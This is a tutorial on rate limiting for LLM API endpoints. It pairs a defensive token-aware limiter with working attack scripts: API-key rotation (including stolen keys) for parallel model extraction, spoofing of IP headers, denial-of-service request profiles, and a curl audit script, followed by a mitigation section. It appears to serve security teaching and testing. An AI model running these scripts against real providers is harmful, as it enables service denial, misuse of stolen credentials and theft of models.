Advanced Rate Limiting Strategies for LLM API Endpoints
Designing, attacking, and defending rate limiting systems for LLM inference APIs to prevent abuse, model extraction, and resource exhaustion
Overview
Rate limiting for LLM APIs is fundamentally more complex than rate limiting traditional web APIs. A standard REST endpoint might handle thousands of identical requests with predictable cost — each request consumes roughly the same CPU time, memory, and bandwidth. LLM inference, however, has wildly variable resource costs: a 10-token prompt requesting 1 completion token is orders of magnitude cheaper than a 100,000-token prompt requesting 4,000 completion tokens. A simple requests-per-minute limit that works for REST APIs is grossly inadequate for LLM endpoints because it treats all requests equally when their actual cost can differ by factors of 10,000 or more.
This asymmetry creates two categories of risk. First, denial of service: an attacker can send a small number of carefully crafted requests that consume massive GPU compute, memory, and time, effectively monopolizing the inference infrastructure. A single request with a maximum-length prompt and maximum output tokens can occupy a GPU for minutes, blocking other users. Second, model extraction: without token-aware rate limiting, an attacker can extract the model's behavior through systematic querying because simple request counting does not constrain the total information transferred from the model.
The challenge is compounded by the diversity of LLM API usage patterns. Streaming responses (Server-Sent Events) maintain long-lived connections. Batch endpoints process multiple prompts per request. Chat completions involve multi-turn conversations with growing context windows. Function calling and tool use add complexity to what constitutes a single "request." Each pattern requires different rate limiting considerations.
This article examines rate limiting from both offensive and defensive perspectives: how to design effective rate limiting for LLM APIs, and how to identify and exploit weaknesses in existing implementations.
LLM Rate Limiting Dimensions
Beyond Requests Per Minute
Effective LLM rate limiting must operate across multiple dimensions simultaneously:
| Dimension | Why It Matters | Example Limit |
|---|---|---|
| Requests per minute (RPM) | Basic abuse prevention | 60 RPM per API key |
| Tokens per minute (TPM) | GPU compute cost control | 100K TPM per API key |
| Input tokens per request | Prevent context window abuse | Max 128K input tokens |
| Output tokens per request | Bound response generation cost | Max 4K output tokens |
| Concurrent requests | GPU memory reservation | 10 concurrent per key |
| Requests per day | Long-term extraction prevention | 10K per day per key |
| Cost per minute | Normalize across model sizes | $1/minute per key |
"""
Multi-dimensional rate limiter for LLM API endpoints.
Implements token-aware limiting using a sliding window algorithm
with separate counters for each dimension.
"""
import time
import hashlib
import json
from dataclasses import dataclass, field
from typing import Optional
from collections import defaultdict
import threading
@dataclass
class RateLimitConfig:
"""Configuration for multi-dimensional LLM rate limiting."""
rpm: int = 60 # Requests per minute
tpm: int = 100_000 # Tokens per minute (input + output)
input_tpm: int = 80_000 # Input tokens per minute
output_tpm: int = 40_000 # Output tokens per minute
max_input_tokens: int = 128_000 # Max input tokens per request
max_output_tokens: int = 4_096 # Max output tokens per request
concurrent: int = 10 # Max concurrent requests
daily_requests: int = 10_000 # Max requests per day
daily_tokens: int = 10_000_000 # Max tokens per day
window_seconds: int = 60 # Sliding window size
@dataclass
class UsageRecord:
"""Tracks usage for a single API key."""
request_timestamps: list[float] = field(default_factory=list)
token_records: list[tuple[float, int, int]] = field(
default_factory=list
) # (timestamp, input_tokens, output_tokens)
active_requests: int = 0
daily_requests: int = 0
daily_tokens: int = 0
daily_reset: float = 0.0
class LLMRateLimiter:
"""
Multi-dimensional rate limiter designed for LLM API endpoints.
Thread-safe with sliding window token counting.
"""
def __init__(self, config: Optional[RateLimitConfig] = None):
self.config = config or RateLimitConfig()
self.usage: dict[str, UsageRecord] = defaultdict(UsageRecord)
self.lock = threading.Lock()
def _clean_window(self, record: UsageRecord, now: float) -> None:
"""Remove entries outside the sliding window."""
cutoff = now - self.config.window_seconds
record.request_timestamps = [
ts for ts in record.request_timestamps if ts > cutoff
]
record.token_records = [
(ts, inp, out) for ts, inp, out in record.token_records
if ts > cutoff
]
# Reset daily counters
if now - record.daily_reset > 86400:
record.daily_requests = 0
record.daily_tokens = 0
record.daily_reset = now
def check_request(
self,
api_key: str,
estimated_input_tokens: int,
requested_output_tokens: int,
) -> tuple[bool, Optional[str], dict]:
"""
Check if a request should be allowed.
Returns:
(allowed, rejection_reason, rate_limit_headers)
"""
now = time.time()
headers: dict[str, str] = {}
with self.lock:
record = self.usage[api_key]
self._clean_window(record, now)
# Check per-request limits
if estimated_input_tokens > self.config.max_input_tokens:
return False, "input_tokens_exceeded", {
"X-RateLimit-Limit-Input-Tokens": str(
self.config.max_input_tokens
),
}
if requested_output_tokens > self.config.max_output_tokens:
return False, "output_tokens_exceeded", {
"X-RateLimit-Limit-Output-Tokens": str(
self.config.max_output_tokens
),
}
# Check RPM
current_rpm = len(record.request_timestamps)
headers["X-RateLimit-Limit-Requests"] = str(self.config.rpm)
headers["X-RateLimit-Remaining-Requests"] = str(
max(0, self.config.rpm - current_rpm)
)
if current_rpm >= self.config.rpm:
return False, "rpm_exceeded", headers
# Check TPM (input + output)
current_input = sum(
inp for _, inp, _ in record.token_records
)
current_output = sum(
out for _, _, out in record.token_records
)
total_tokens = current_input + current_output
estimated_new_total = (
total_tokens + estimated_input_tokens + requested_output_tokens
)
headers["X-RateLimit-Limit-Tokens"] = str(self.config.tpm)
headers["X-RateLimit-Remaining-Tokens"] = str(
max(0, self.config.tpm - total_tokens)
)
if estimated_new_total > self.config.tpm:
return False, "tpm_exceeded", headers
if current_input + estimated_input_tokens > self.config.input_tpm:
return False, "input_tpm_exceeded", headers
# Check concurrent requests
if record.active_requests >= self.config.concurrent:
return False, "concurrent_exceeded", headers
# Check daily limits
if record.daily_requests >= self.config.daily_requests:
return False, "daily_requests_exceeded", headers
if record.daily_tokens + estimated_new_total > self.config.daily_tokens:
return False, "daily_tokens_exceeded", headers
# All checks passed — record the request
record.request_timestamps.append(now)
record.active_requests += 1
record.daily_requests += 1
return True, None, headers
def record_completion(
self,
api_key: str,
actual_input_tokens: int,
actual_output_tokens: int,
) -> None:
"""Record actual token usage after request completes."""
now = time.time()
with self.lock:
record = self.usage[api_key]
record.token_records.append(
(now, actual_input_tokens, actual_output_tokens)
)
record.active_requests = max(0, record.active_requests - 1)
record.daily_tokens += actual_input_tokens + actual_output_tokens
def get_usage_stats(self, api_key: str) -> dict:
"""Get current usage statistics for an API key."""
now = time.time()
with self.lock:
record = self.usage[api_key]
self._clean_window(record, now)
input_tokens = sum(
inp for _, inp, _ in record.token_records
)
output_tokens = sum(
out for _, _, out in record.token_records
)
return {
"rpm_used": len(record.request_timestamps),
"rpm_limit": self.config.rpm,
"tpm_used": input_tokens + output_tokens,
"tpm_limit": self.config.tpm,
"input_tpm_used": input_tokens,
"output_tpm_used": output_tokens,
"concurrent_used": record.active_requests,
"concurrent_limit": self.config.concurrent,
"daily_requests_used": record.daily_requests,
"daily_requests_limit": self.config.daily_requests,
}Attacking Rate Limiters
Identity Rotation
The most straightforward rate limit bypass is to use multiple identities. If rate limits are enforced per API key, an attacker with access to many keys (purchased, stolen, or generated through self-service signup) can multiply their effective rate limit:
"""
Rate limit bypass through API key rotation.
Demonstrates how multi-key strategies defeat per-key rate limiting.
"""
import requests
import time
import itertools
from typing import Optional
from concurrent.futures import ThreadPoolExecutor, as_completed
class RateLimitBypass:
"""
Bypass per-key rate limits by rotating across multiple API keys.
"""
def __init__(
self,
target_url: str,
api_keys: list[str],
):
self.target_url = target_url
self.api_keys = api_keys
self.key_cycle = itertools.cycle(api_keys)
self.key_usage: dict[str, int] = {k: 0 for k in api_keys}
self.total_requests = 0
self.total_tokens = 0
def _get_next_key(self) -> str:
"""Get the next API key in the rotation."""
return next(self.key_cycle)
def send_request(
self,
prompt: str,
max_tokens: int = 100,
) -> Optional[dict]:
"""Send a single request using the next available key."""
api_key = self._get_next_key()
try:
resp = requests.post(
f"{self.target_url}/v1/completions",
headers={"Authorization": f"Bearer {api_key}"},
json={
"model": "target-model",
"prompt": prompt,
"max_tokens": max_tokens,
"temperature": 0.0,
},
timeout=60,
)
self.key_usage[api_key] += 1
self.total_requests += 1
if resp.status_code == 200:
data = resp.json()
usage = data.get("usage", {})
self.total_tokens += usage.get("total_tokens", 0)
return data
elif resp.status_code == 429:
# This key is rate limited, try next
return self.send_request(prompt, max_tokens)
else:
return None
except requests.RequestException:
return None
def parallel_extraction(
self,
prompts: list[str],
max_workers: int = 10,
) -> list[dict]:
"""
Send multiple requests in parallel across all keys.
Effective rate = per_key_rate * num_keys.
"""
results = []
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futures = {
executor.submit(self.send_request, p): p
for p in prompts
}
for future in as_completed(futures):
result = future.result()
if result:
results.append(result)
return results
def report(self) -> dict:
"""Generate a report of the bypass attempt."""
return {
"total_requests": self.total_requests,
"total_tokens": self.total_tokens,
"keys_used": len(self.api_keys),
"per_key_usage": self.key_usage,
"effective_multiplier": (
self.total_requests / max(
self.key_usage.values(), default=1
)
),
}Header Manipulation and IP Spoofing
Some rate limiters use the client IP address or forwarded-for headers for identification. Behind load balancers or CDNs, the true client IP is often communicated through headers like X-Forwarded-For, X-Real-IP, or CF-Connecting-IP. If the rate limiter trusts these headers from any source, an attacker can spoof different IP addresses:
"""
Rate limit bypass through header manipulation.
Tests if the target trusts client-provided IP headers.
"""
import requests
import random
from typing import Optional
def generate_random_ip() -> str:
"""Generate a random public IPv4 address."""
while True:
ip = f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
# Avoid private/reserved ranges
first_octet = int(ip.split(".")[0])
if first_octet not in (10, 127, 169, 172, 192, 224):
return ip
def test_header_bypass(
target_url: str,
api_key: str,
num_requests: int = 100,
) -> dict:
"""
Test if the rate limiter can be bypassed by spoofing IP headers.
Sends requests with different X-Forwarded-For headers.
"""
results = {"success": 0, "rate_limited": 0, "error": 0}
# Headers that various proxies/LBs use for client IP
ip_headers = [
"X-Forwarded-For",
"X-Real-IP",
"X-Client-IP",
"CF-Connecting-IP",
"True-Client-IP",
"X-Originating-IP",
]
for i in range(num_requests):
fake_ip = generate_random_ip()
headers = {
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
}
# Set all known IP headers to the same fake IP
for header_name in ip_headers:
headers[header_name] = fake_ip
try:
resp = requests.post(
f"{target_url}/v1/completions",
headers=headers,
json={
"model": "target-model",
"prompt": f"Test request {i}",
"max_tokens": 1,
},
timeout=30,
)
if resp.status_code == 200:
results["success"] += 1
elif resp.status_code == 429:
results["rate_limited"] += 1
else:
results["error"] += 1
except requests.RequestException:
results["error"] += 1
# Analyze results
if results["rate_limited"] == 0 and results["success"] > 0:
results["verdict"] = (
"VULNERABLE: No rate limiting observed with IP header spoofing. "
"The rate limiter may trust X-Forwarded-For from untrusted sources."
)
elif results["rate_limited"] > 0 and results["success"] > results["rate_limited"]:
results["verdict"] = (
"PARTIALLY VULNERABLE: Rate limiting is inconsistent, "
"suggesting IP headers partially influence rate limit identity."
)
else:
results["verdict"] = (
"NOT VULNERABLE: Rate limiting was consistently enforced "
"regardless of IP header values."
)
return resultsTiming and Resource Exhaustion
Even with proper rate limiting, LLM APIs can be vulnerable to resource exhaustion through carefully crafted requests that maximize compute cost per request:
- Maximum context window: Send prompts that fill the entire context window. The compute cost of attention scales quadratically with sequence length.
- Maximum output tokens: Request the maximum allowed output tokens to occupy the GPU for as long as possible.
- Adversarial prompts: Craft prompts that cause the model to produce long, repetitive outputs or enter slow generation paths.
- Streaming connection holding: Open streaming connections and read very slowly, holding server resources.
"""
Resource exhaustion attack testing for LLM APIs.
Measures the actual GPU cost of different request profiles
to identify the most cost-effective denial-of-service vectors.
"""
import requests
import time
import concurrent.futures
from dataclasses import dataclass
from typing import Optional
@dataclass
class RequestProfile:
"""A request configuration designed to test resource limits."""
name: str
prompt: str
max_tokens: int
temperature: float = 0.0
stream: bool = False
class ResourceExhaustionTester:
"""
Test LLM API resilience to resource exhaustion attacks.
Measures server response time and availability under
various adversarial request profiles.
"""
def __init__(self, target_url: str, api_key: str):
self.target_url = target_url.rstrip("/")
self.api_key = api_key
self.results: list[dict] = []
def _send_request(self, profile: RequestProfile) -> dict:
"""Send a single request and measure resource consumption."""
start = time.time()
try:
resp = requests.post(
f"{self.target_url}/v1/completions",
headers={"Authorization": f"Bearer {self.api_key}"},
json={
"model": "default",
"prompt": profile.prompt,
"max_tokens": profile.max_tokens,
"temperature": profile.temperature,
"stream": profile.stream,
},
timeout=120,
)
elapsed = time.time() - start
usage = {}
if resp.status_code == 200:
data = resp.json()
usage = data.get("usage", {})
return {
"profile": profile.name,
"status": resp.status_code,
"elapsed_seconds": elapsed,
"prompt_tokens": usage.get("prompt_tokens", 0),
"completion_tokens": usage.get("completion_tokens", 0),
"total_tokens": usage.get("total_tokens", 0),
"cost_per_second": (
usage.get("total_tokens", 0) / max(elapsed, 0.001)
),
}
except requests.Timeout:
return {
"profile": profile.name,
"status": 0,
"elapsed_seconds": time.time() - start,
"error": "timeout",
}
except requests.ConnectionError:
return {
"profile": profile.name,
"status": 0,
"elapsed_seconds": time.time() - start,
"error": "connection_lost",
}
def generate_attack_profiles(self) -> list[RequestProfile]:
"""Generate request profiles that stress different resources."""
profiles = [
# Baseline: minimal request
RequestProfile(
name="baseline",
prompt="Hi",
max_tokens=1,
),
# Long input, short output (KV cache pressure)
RequestProfile(
name="long_input",
prompt="Summarize: " + "The quick brown fox. " * 5000,
max_tokens=10,
),
# Short input, long output (generation time)
RequestProfile(
name="long_output",
prompt="Write a very detailed essay about:",
max_tokens=4096,
),
# Long input AND long output (maximum resource)
RequestProfile(
name="max_resources",
prompt="Expand on each point: " + "Point. " * 5000,
max_tokens=4096,
),
# Repetitive input (potential degenerate attention)
RequestProfile(
name="repetitive",
prompt="repeat " * 10000,
max_tokens=100,
),
# Streaming (holds connection)
RequestProfile(
name="streaming_hold",
prompt="Tell me a very long story",
max_tokens=4096,
stream=True,
),
]
return profiles
def run_availability_test(
self,
attack_profile: RequestProfile,
num_attack_requests: int = 10,
num_probe_requests: int = 5,
) -> dict:
"""
Test if attack requests degrade service for legitimate requests.
Sends attack requests concurrently, then measures probe latency.
"""
baseline_profile = RequestProfile(
name="probe", prompt="What is 2+2?", max_tokens=5,
)
# Measure baseline latency
baseline_times = []
for _ in range(num_probe_requests):
result = self._send_request(baseline_profile)
if result.get("status") == 200:
baseline_times.append(result["elapsed_seconds"])
avg_baseline = (
sum(baseline_times) / len(baseline_times)
if baseline_times else 0
)
# Send attack requests concurrently
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_attack_requests
) as executor:
attack_futures = [
executor.submit(self._send_request, attack_profile)
for _ in range(num_attack_requests)
]
# While attack is running, measure probe latency
time.sleep(1) # Brief delay to let attacks start
probe_times = []
for _ in range(num_probe_requests):
result = self._send_request(baseline_profile)
if result.get("status") == 200:
probe_times.append(result["elapsed_seconds"])
elif result.get("status") == 429:
probe_times.append(-1) # Rate limited
# Collect attack results
attack_results = [f.result() for f in attack_futures]
avg_under_attack = (
sum(t for t in probe_times if t > 0)
/ max(len([t for t in probe_times if t > 0]), 1)
)
rate_limited_probes = sum(1 for t in probe_times if t == -1)
return {
"attack_profile": attack_profile.name,
"baseline_latency_ms": avg_baseline * 1000,
"attack_latency_ms": avg_under_attack * 1000,
"latency_increase": (
(avg_under_attack / max(avg_baseline, 0.001) - 1) * 100
),
"probes_rate_limited": rate_limited_probes,
"attack_successes": sum(
1 for r in attack_results if r.get("status") == 200
),
"attack_blocked": sum(
1 for r in attack_results if r.get("status") == 429
),
}Session and Token Reuse Attacks
Another class of rate limit bypass targets the session and token lifecycle. Many LLM API providers use JWT tokens or session tokens for authentication, and the rate limit is tied to the token identity. Attacks include:
- Token farming: Creating many free-tier accounts to accumulate API tokens, then using them in rotation for high-volume querying.
- Token sharing services: Underground services that pool stolen or leaked API keys, distributing requests across all keys to stay under per-key limits.
- Session fixation: If the rate limiter uses session cookies, an attacker may be able to generate new sessions rapidly by clearing cookies between requests.
- OAuth token rotation: Rapidly requesting new OAuth access tokens from the authorization server, where each new token gets a fresh rate limit window.
Defending against these attacks requires correlating usage across identity dimensions — detecting that 50 different API keys are making identical queries from the same IP range, or that token creation velocity for an account is abnormally high.
Practical Examples
Rate Limit Audit Tool
#!/usr/bin/env bash
# Quick audit of rate limiting configuration on an LLM API endpoint
TARGET="${1:?Usage: $0 <api_url> <api_key>}"
API_KEY="${2:?Usage: $0 <api_url> <api_key>}"
echo "=== LLM API Rate Limit Audit ==="
echo "Target: $TARGET"
echo ""
# Test 1: Check rate limit headers
echo "--- Rate Limit Headers ---"
RESP=$(curl -s -D - -o /dev/null \
-X POST "${TARGET}/v1/completions" \
-H "Authorization: Bearer ${API_KEY}" \
-H "Content-Type: application/json" \
-d '{"model":"default","prompt":"test","max_tokens":1}')
echo "$RESP" | grep -iE "x-ratelimit|retry-after|ratelimit" || echo "No rate limit headers found"
echo ""
echo "--- Burst Test (20 rapid requests) ---"
SUCCESS=0
LIMITED=0
for i in $(seq 1 20); do
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "${TARGET}/v1/completions" \
-H "Authorization: Bearer ${API_KEY}" \
-H "Content-Type: application/json" \
-d '{"model":"default","prompt":"test","max_tokens":1}')
if [ "$CODE" = "200" ]; then
SUCCESS=$((SUCCESS + 1))
elif [ "$CODE" = "429" ]; then
LIMITED=$((LIMITED + 1))
fi
done
echo "Successful: $SUCCESS, Rate limited: $LIMITED"
if [ "$LIMITED" -eq 0 ]; then
echo "[WARN] No rate limiting triggered during burst"
fi
echo ""
echo "--- Token-based Rate Limit Test ---"
# Send a request with high token count
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "${TARGET}/v1/completions" \
-H "Authorization: Bearer ${API_KEY}" \
-H "Content-Type: application/json" \
-d '{"model":"default","prompt":"'"$(python3 -c "print('word ' * 10000)")"'","max_tokens":4096}')
echo "Large request (10K input + 4K output tokens): HTTP $CODE"
echo ""
echo "=== Audit Complete ==="Defense and Mitigation
Multi-dimensional rate limiting: Implement limits on both requests and tokens. OpenAI's rate limiting model is a good reference — they enforce RPM, TPM, RPD (requests per day), and TPD (tokens per day) limits simultaneously, with separate counters for input and output tokens.
Cost-based rate limiting: Assign a cost to each request based on actual GPU compute consumed (proportional to input_length * output_length for attention-based models) and limit total cost per time window. This naturally handles the asymmetry between cheap and expensive requests.
API key management: Implement key issuance controls that prevent bulk key generation. Require identity verification for API access. Monitor for keys with correlated usage patterns that suggest a single operator rotating keys.
IP and fingerprint defense-in-depth: Do not rely solely on IP-based rate limiting. Use API key as the primary identity, IP address as secondary, and consider device fingerprinting for web-based access. Always extract the true client IP from trusted proxy headers only — configure your reverse proxy chain correctly and strip these headers from untrusted sources.
Anomaly detection: Monitor for patterns that indicate extraction attempts: high volume of low-temperature requests, systematic input variations, unusual prompt distributions, and access from known VPN/proxy ranges. Flag accounts that exhibit these patterns for review.
Adaptive rate limiting: Reduce rate limits for accounts showing suspicious patterns rather than hard-blocking them. This makes detection harder for attackers and provides a more gradual degradation of service for borderline cases.
Streaming-aware rate limiting: For streaming responses (Server-Sent Events), implement connection-level limits in addition to request-level limits. Track the total time a connection has been open and the total tokens streamed. An attacker who opens many streaming connections simultaneously can exhaust server connection pools even within per-request rate limits. Implement maximum concurrent streaming connections per API key and maximum total stream duration.
Request fingerprinting: Beyond API key and IP address, fingerprint requests based on their content patterns. A legitimate user's prompts have natural language characteristics — varying length, diverse vocabulary, context-dependent content. Model extraction queries tend to be more systematic: uniform length, methodical topic coverage, low temperature, and logprobs requested. Building a behavioral fingerprint per API key and alerting on sudden changes in query patterns can detect extraction even when the attacker stays within rate limits.
Defense against distributed extraction: When an attacker coordinates extraction across many API keys and IP addresses, individual-key rate limiting is insufficient. Implement aggregate rate limiting that caps the total query volume to a specific model across all keys. Monitor the total unique prompt diversity across all clients — a distributed extraction campaign will show an unnaturally systematic coverage of the input space even when no individual client exceeds their limits.
Output perturbation as a defense: Rather than relying solely on rate limiting to prevent model extraction, add small random perturbations to model outputs. For classification models, add Laplace or Gaussian noise to confidence scores. For generative models, vary the sampling temperature slightly between requests. These perturbations are imperceptible to legitimate users but degrade the quality of extracted training data, requiring significantly more queries for a successful extraction. This defense is complementary to rate limiting and provides protection even when rate limits are bypassed. Research from Tramèr et al. shows that even small output perturbations can increase the query cost of model extraction by orders of magnitude while maintaining acceptable service quality for legitimate users.
References
- OpenAI. (2025). "Rate Limits." OpenAI Platform Documentation. https://platform.openai.com/docs/guides/rate-limits
- OWASP. (2024). "Blocking Brute Force Attacks." https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks
- Tramèr, F., Zhang, F., Juels, A., Reiter, M. K., & Ristenpart, T. (2016). "Stealing Machine Learning Models via Prediction APIs." USENIX Security Symposium. https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/tramer
- MITRE ATLAS. "ML Model Theft via Prediction API." https://atlas.mitre.org/techniques/AML.T0024